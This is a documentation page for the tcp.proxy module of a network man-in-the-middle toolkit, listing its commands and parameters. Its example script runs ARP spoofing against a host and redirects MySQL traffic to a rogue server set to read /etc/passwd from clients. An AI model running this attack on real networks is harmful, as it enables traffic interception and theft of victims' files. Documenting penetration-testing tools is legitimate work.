3 tcp.proxy
Simone Margaritelli edited this page 2018-04-27 15:41:24 +02:00

A TCP transparent proxy that can be scripted using javascript modules. If used together with a spoofer, all TCP traffic to a given address and port will be redirected to it and it will automatically handle port redirections as needed.

The optional tcp.tunnel parameter can be used to redirect the traffic from tcp.address to tcp.tunnel.address.

Commands

command description
tcp.proxy on Start the TCP proxy.
tcp.proxy off Stop the TCP proxy.

Parameters

parameter default description
tcp.port 443 TCP port to redirect when the proxy is activated.
tcp.address Mandatory remote address of the TCP proxy.
tcp.proxy.port 8443 Port to bind the TCP proxy to.
tcp.proxy.address <interface address> Address to bind the TCP proxy to.
tcp.proxy.script Path of a proxy module script.
tcp.tunnel.address Address to redirect the TCP tunnel to (optional).
tcp.tunnel.port Port to redirect the TCP tunnel to (optional)

Examples

The rogue-mysql-server.cap executes an ARP spoofing attack against a single host and redirect the MySQL traffic to a rogue server.

# set the target for arp spoofing
set arp.spoof.targets 192.168.1.236

# bind rogue mysql server to localhost and
# set the file we want to read
set mysql.server.address 127.0.0.1
set mysql.server.port 3306
set mysql.server.infile /etc/passwd
mysql.server on

# set the ip from the mysql server we want to impersonate
set tcp.address 93.184.216.34
set tcp.port 3306

# set the ip from the rogue mysql server
set tcp.tunnel.address 127.0.0.1
set tcp.tunnel.port 3306

# go ^_^
tcp.proxy on
arp.spoof on